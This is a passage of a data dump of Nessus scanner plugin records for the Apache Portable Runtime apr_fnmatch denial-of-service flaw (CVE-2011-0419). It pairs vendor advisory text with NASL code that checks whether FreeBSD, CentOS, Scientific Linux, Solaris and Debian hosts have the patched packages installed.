reference:\"1.4.2-6+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapr1-dbg\", reference:\"1.4.2-6+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapr1-dev\", reference:\"1.4.2-6+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:07", "description": "The Apache Portable Runtime Project reports :\n\nNote especially a security fix to APR 1.4.4, excessive CPU consumption was possible due to an unconstrained, recursive invocation of apr_fnmatch, as apr_fnmatch processed '*' wildcards. Reimplement apr_fnmatch() from scratch using a non-recursive algorithm now has improved compliance with the fnmatch() spec. (William Rowe)", "cvss3": {}, "published": "2011-05-16T00:00:00", "type": "nessus", "title": "FreeBSD : Apache APR -- DoS vulnerabilities (00b296b6-7db1-11e0-96b7-00300582f9fc)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apr1", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_00B296B67DB111E096B700300582F9FC.NASL", "href": "https://www.tenable.com/plugins/nessus/53905", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53905);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-0419\");\n\n script_name(english:\"FreeBSD : Apache APR -- DoS vulnerabilities (00b296b6-7db1-11e0-96b7-00300582f9fc)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache Portable Runtime Project reports :\n\nNote especially a security fix to APR 1.4.4, excessive CPU consumption\nwas possible due to an unconstrained, recursive invocation of\napr_fnmatch, as apr_fnmatch processed '*' wildcards. Reimplement\napr_fnmatch() from scratch using a non-recursive algorithm now has\nimproved compliance with the fnmatch() spec. (William Rowe)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apache.org/dist/apr/Announcement1.x.html\"\n );\n # https://vuxml.freebsd.org/freebsd/00b296b6-7db1-11e0-96b7-00300582f9fc.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ce7660e9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apr1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apr1<1.4.4.1.3.11\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:37", "description": "Updated apr packages that fix one security issue are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the Apache HTTP Server and other projects. It provides a free library of C data structures and routines.\n\nIt was discovered that the apr_fnmatch() function used an unconstrained recursion when processing patterns with the '*' wildcard. An attacker could use this flaw to cause an application using this function, which also accepted untrusted input as a pattern for matching (such as an httpd server using the mod_autoindex module), to exhaust all stack memory or use an excessive amount of CPU time when performing matching. (CVE-2011-0419)\n\nRed Hat would like to thank Maksymilian Arciemowicz for reporting this issue.\n\nAll apr users should upgrade to these updated packages, which contain a backported patch to correct this issue. Applications using the apr library, such as httpd, must be restarted for this update to take effect.", "cvss3": {}, "published": "2011-05-12T00:00:00", "type": "nessus", "title": "CentOS 4 / 5 : apr (CESA-2011:0507)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:apr", "p-cpe:/a:centos:centos:apr-devel", "p-cpe:/a:centos:centos:apr-docs", "cpe:/o:centos:centos:4", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2011-0507.NASL", "href": "https://www.tenable.com/plugins/nessus/53872", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:0507 and \n# CentOS Errata and Security Advisory 2011:0507 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53872);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-0419\");\n script_xref(name:\"RHSA\", value:\"2011:0507\");\n\n script_name(english:\"CentOS 4 / 5 : apr (CESA-2011:0507)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apr packages that fix one security issue are now available for\nRed Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C\ndata structures and routines.\n\nIt was discovered that the apr_fnmatch() function used an\nunconstrained recursion when processing patterns with the '*'\nwildcard. An attacker could use this flaw to cause an application\nusing this function, which also accepted untrusted input as a pattern\nfor matching (such as an httpd server using the mod_autoindex module),\nto exhaust all stack memory or use an excessive amount of CPU time\nwhen performing matching. (CVE-2011-0419)\n\nRed Hat would like to thank Maksymilian Arciemowicz for reporting this\nissue.\n\nAll apr users should upgrade to these updated packages, which contain\na backported patch to correct this issue. Applications using the apr\nlibrary, such as httpd, must be restarted for this update to take\neffect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-May/017553.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ed35eba2\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-May/017554.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0fb6c3a9\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-May/017555.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d808d983\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-May/017556.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d82d77aa\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected apr packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apr-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"apr-0.9.4-25.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"apr-0.9.4-25.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"apr-devel-0.9.4-25.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"apr-devel-0.9.4-25.el4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"apr-1.2.7-11.el5_6.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"apr-devel-1.2.7-11.el5_6.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"apr-docs-1.2.7-11.el5_6.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr / apr-devel / apr-docs\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:15", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite (subcomponent: Library/libc). Supported versions that are affected are 9 and 10. Difficult to exploit vulnerability allows successful unauthenticated network attacks via TCP/IP. Successful attack of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Solaris.", "cvss3": {}, "published": "2018-03-12T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 147713-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:147713", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_147713-01.NASL", "href": "https://www.tenable.com/plugins/nessus/107622", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107622);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0419\");\n\n script_name(english:\"Solaris 10 (sparc) : 147713-01\");\n script_summary(english:\"Check for patch 147713-01\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 147713-01\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Library/libc). Supported versions that are affected are\n9 and 10. Difficult to exploit vulnerability allows successful\nunauthenticated network attacks via TCP/IP. Successful attack of this\nvulnerability can result in unauthorized ability to cause a partial\ndenial of service (partial DOS) of Solaris.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/147713-01\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 147713-01\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:147713\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"147713-01\", obsoleted_by:\"147440-05 147147-26 \", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWcslr\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:10", "description": "It was discovered that the apr_fnmatch() function used an unconstrained recursion when processing patterns with the '*' wildcard. An attacker could use this flaw to cause an application using this function, which also accepted untrusted input as a pattern for matching (such as an httpd server using the mod_autoindex module), to exhaust all stack memory or use an excessive amount of CPU time when performing matching. (CVE-2011-0419)\n\nApplications using the apr library, such as httpd, must be restarted for this update to take effect.", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : apr on SL4.x, SL5.x, SL6.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20110511_APR_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61036", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61036);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0419\");\n\n script_name(english:\"Scientific Linux Security Update : apr on SL4.x, SL5.x, SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the apr_fnmatch() function used an\nunconstrained recursion when processing patterns with the '*'\nwildcard. An attacker could use this flaw to cause an application\nusing this function, which also accepted untrusted input as a pattern\nfor matching (such as an httpd server using the mod_autoindex module),\nto exhaust all stack memory or use an excessive amount of CPU time\nwhen performing matching. (CVE-2011-0419)\n\nApplications using the apr library, such as httpd, must be restarted\nfor this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1105&L=scientific-linux-errata&T=0&P=1112\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e9cb5b11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apr, apr-devel and / or apr-docs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"apr-0.9.4-25.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"apr-devel-0.9.4-25.el4\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"apr-1.2.7-11.el5_6.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"apr-devel-1.2.7-11.el5_6.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"apr-docs-1.2.7-11.el5_6.4\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"apr-1.3.9-3.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"apr-devel-1.3.9-3.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:15", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite (subcomponent: Library/libc). Supported versions that are affected are 9 and 10. Difficult to exploit vulnerability allows successful unauthenticated network attacks via TCP/IP. Successful attack of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Solaris.", "cvss3": {}, "published": "2018-03-12T00:00:00", "type": "nessus", "title": "Solaris 10 (x86) : 147714-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:147714", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_147714-01.NASL", "href": "https://www.tenable.com/plugins/nessus/108114", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108114);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0419\");\n\n script_name(english:\"Solaris 10 (x86) : 147714-01\");\n script_summary(english:\"Check for patch 147714-01\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 147714-01\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Library/libc). Supported versions that are affected are\n9 and 10. Difficult to exploit vulnerability allows successful\nunauthenticated network attacks via TCP/IP. Successful attack of this\nvulnerability can result in unauthorized ability to cause a partial\ndenial of service (partial DOS) of Solaris.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/147714-01\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 147714-01\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:147714\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"147714-01\", obsoleted_by:\"147441-05 147148-26 \", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"147714-01\", obsoleted_by:\"147441-05 147148-26 \", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWcsl / SUNWcslr\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:49", "description": "Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.", "cvss3": {}, "published": "2014-12-19T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Apache vulnerability (SOL15920)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-03-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_application_security_manager", 